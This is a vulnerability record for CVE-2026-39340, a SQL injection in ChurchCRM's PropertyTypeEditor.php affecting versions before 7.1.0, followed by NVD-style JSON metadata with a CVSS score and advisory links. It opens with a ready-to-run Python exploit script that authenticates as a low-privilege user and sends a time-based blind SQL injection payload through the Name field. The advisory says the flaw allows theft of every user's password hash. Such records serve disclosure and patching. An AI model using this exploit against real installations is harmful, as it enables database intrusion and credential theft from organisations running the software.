CVE-2026-39340

import requests # Target configuration target_url = "http://target-churchcrm.com/PropertyTypeEditor.php" session = requests.Session() # 1. Authenticate as a user with 'MenuOptions' role login_data = { "User": "attacker", "Password": "password123" } session.post("http://target-churchcrm.com/login", data=login_data) # 2. Exploit SQL Injection via PropertyTypeEditor (Update/Insert) # The vulnerability is in the 'Name' or 'Description' fields. # Payload for Time-Based Blind SQL Injection sqli_payload = "test' OR (SELECT SLEEP(5))-- -" post_data = { "TypeID": "1", # ID for UPDATE, or empty for INSERT "Name": sqli_payload, "Description": "Exfiltration attempt" } response = session.post(target_url, data=post_data) # 3. Verify based on response time if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: Database delayed response.") else: print("[-] Vulnerability not detected or payload failed.")

{"cve": {"id": "CVE-2026-39340", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:46.010", "lastModified": "2026-04-09T18:43:44.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, a SQL injection vulnerability exists in PropertyTypeEditor.php, part of the administration functionality for managing property type categories (People → Person Properties / Family Properties). The vulnerability was introduced when legacyFilterInput() which both strips HTML and escapes SQL — was replaced with sanitizeText(), which strips HTML only. User-supplied values from the Name and Description fields are concatenated directly into raw INSERT and UPDATE queries with no SQL escaping. This allows any authenticated user with the MenuOptions role (a non-admin staff permission) to perform time-based blind injection and exfiltrate any data from the database, including password hashes of all users. This vulnerability is fixed in 7.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-66f7-4p96-mww9", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-66f7-4p96-mww9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}